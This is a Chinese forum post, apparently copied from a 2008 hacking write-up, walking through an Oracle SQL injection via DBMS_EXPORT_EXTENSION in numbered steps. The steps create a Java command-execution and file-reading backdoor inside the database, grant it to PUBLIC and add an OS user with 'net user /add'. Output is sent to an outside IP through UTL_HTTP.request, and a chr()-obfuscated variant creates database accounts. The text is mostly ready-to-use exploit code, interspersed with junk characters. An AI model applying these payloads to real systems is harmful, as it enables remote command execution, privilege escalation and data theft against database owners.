以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
6 l+ r: `( t; _; L& |6 `9 I% |3 G/ v& U3 G
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
9 d0 L- ?" U; e& y( s! o- l的形式即可。(用" 'a'|| "是为了让语句返回true值) e. i2 i# ?& ]/ N" S/ }9 A& Z% c
语句有点长,可能要用post提交。 $ P# K4 ?' E6 E! {6 U4 j
以下是各个步骤:
; G6 T5 p I) P9 r& p) \/ x1.创建包 + H# e( `3 t& x+ c4 ?+ K
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:- h; u) \1 F0 i& V0 p C9 y
/xxx.jsp?id=1 and '1'<>'a'||( $ T# j7 I: w0 O! d D2 I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 U0 E" X4 K0 Z- [% O; G
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
$ g" v6 s4 Z0 j" H8 [+ N$ j( hnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
, _% I& w6 T, Q& \' C& Z o}'''';END;'';END;--','SYS',0,'1',0) from dual
* i0 h T& G: T9 _)
" T, A6 T: a( h0 b. C------------------------ & o: E2 U t2 _$ Y
如果url有长度限制,可以把readFile()函数块去掉,即: 7 c2 `, {7 M$ D' I5 x! k
/xxx.jsp?id=1 and '1'<>'a'||(
2 z! l) Q6 x0 |. H: ]; Gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 s/ U9 ~0 p- Q5 f
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader($ }* {( s, X. T0 u
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
: B6 `& B* [- l1 @& B u1 G5 M}'''';END;'';END;--','SYS',0,'1',0) from dual
3 P, w* i3 i( }: S+ y2 j)
0 ~9 H) ?! ~+ o x/ @# E- X同时把后面步骤 提到的 对readFile()的处理语句去掉。
1 u9 o& R1 E' i; a------------------------------
( @6 T w. i4 c8 H- z2.赋Java权限
7 e9 T1 o3 U3 ]# _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual- A8 N8 @$ h5 E5 S
3.创建函数 " `; g1 \2 T& \" z' R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 g* ~- s+ a$ \/ V0 v: K Jcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
/ G; ~6 g. A# Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
R2 h$ I+ P- T, q6 G1 Ccreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
2 Q, T# g# K- e; J$ y7 c8 h4.赋public执行函数的权限 3 \0 M4 E, x k7 n9 w5 I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
. T$ r) M( p$ ~4 kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
1 B6 T; k3 N0 a9 u5.测试上面的几步是否成功
3 d n7 Z9 Q% ^ r# a" pand '1'<>'11'||( 6 G' a- f0 H/ j9 a& P
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
# t* z$ L" L# x; B. Z)
~$ s2 D& b$ y3 v3 ^and '1'<>( 9 Z# ~+ a. E* k" Y
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
9 M! f8 }( T8 ~)
5 Y+ {4 L/ t! I8 e' @* w% p3 w6.执行命令:
$ |" r6 g: m2 y/xxx.jsp?id=1 and '1'<>(
/ }6 Z9 `/ z, Q! S" Z: T! ]select sys.LinxRunCMD('cmd /c net user linx /add') from dual 5 ~' R" A6 L/ G; C) r" I/ Y: s
3 s( J6 j, V& e. G: R
) 5 S: P# C- F9 ~! l- e- P; b
/xxx.jsp?id=1 and '1'<>(
) z8 H: }$ ]% ]& I5 O. eselect sys.LinxReadFile('c:/boot.ini') from dual
# a$ Z" E6 ^+ P/ k9 `' [; z, O8 Z- c5 J0 Q {5 G
)
I$ k# f4 e) g( U6 F8 U2 i 5 q6 I& K4 P5 \1 z# N
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
1 v! s0 y) L7 I- t1 m( d8 U+ v6 U如果要查看运行结果可以用 union :
& @5 f; M0 v2 ] Z1 e/ D/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual4 p1 x) Q5 }) v
或者UTL_HTTP.request(:
& O7 K) W0 z1 P+ a' z; f8 _( a8 U/xxx.jsp?id=1 and '1'<>( 8 I" s" H1 x: b
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual0 Y8 y; d: b6 h* N# k
)
1 y% m; L0 E% Y$ b" k/xxx.jsp?id=1 and '1'<>(
" M/ W, n& i; p/ `" ?SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
+ L* |7 p' Z4 Q( g)
$ L+ ?- ~6 c9 S" J& E注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。# ]- X- g: e) ?6 _2 i3 I
-------------------- 0 j0 b4 J0 L5 r# r
6.内部变化
: y: K% A- Q( W: H; l- ^+ Y通过以下命令可以查看all_objects表达改变: 9 k$ Q& m' R# `% x$ C8 |6 I2 ^9 Y
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
; O3 |5 {. u# |& q2 n% R; ~, N7.删除我们创建的函数
$ d0 m2 D$ \) n4 r; Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 L/ [5 j* s. ]& b
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual ; L; \" v: x5 I7 Q
====================================================
* @$ q- E, @ V1 a: X- S( r全文结束。谨以此文赠与我的朋友。
8 l/ y$ V* I0 v3 H3 k. @linx ! t' [( W& ^; n$ e
124829445
* i& P; G4 w3 ?2008.1.12 2 K! K: e# k [) } \; x0 v, V
linyujian@bjfu.edu.cn
, o2 l7 [4 z! S====================================================================== % Y0 Q- J# d% @" @" D
测试漏洞的另一方法: $ G2 l2 c: n r9 P
创建oracle帐号:
4 h% N' N* V6 Y+ `( Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ ]) F+ `# D. x, WCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual% H5 A) ]% Q- e9 S4 y+ _
即: ) a' Q( G8 K) d9 ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
" |- |# `" s) w9 K4 O6 L; o2 [% }chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual , d. j- v1 y2 z# o$ _
确定漏洞存在:
$ L0 n. F G- v7 j6 C1<>(
1 j7 L8 w1 K; i0 g' _* u6 pselect user_id from all_users where username='LINXSQL' 1 |8 y4 J& V8 K- n; z: g
) " |8 _% l. c1 y
给linxsql连接权限:
2 O6 r: C! E7 [, jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% x% ^6 |+ u: {* O4 K( _7 a8 a$ }GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
0 w# ]. N4 ~ @/ M删除帐号: . N* w( ?" s! i+ \. q
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: i1 k/ o5 x1 c7 ~6 g+ h/ bdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
- y7 ~/ h3 l- V$ ~======================
/ L$ ^' X5 X! Y( E/ r3 W* ?6 [* l# T以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:1 p% P. A) ^) Y8 e' ~6 s# Q
1.jsp?id=1 and '1'<>(
* e3 _! i( I/ v H" Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& N' a. s+ n. ~9 A. x% ?) Ycreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
' w( r! U M+ s) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
' i' |: r1 @5 T: x) x4 @ )
' t7 T, A, s2 I Q) \% F5 N. ?/ q
( A5 f5 z% ^3 o, l1 @! z, E6 k$ z9 \8 K0 Q
0 R- z3 _$ U' \ q |
发表于 2012-12-18 12:21:48
收藏
支持
反对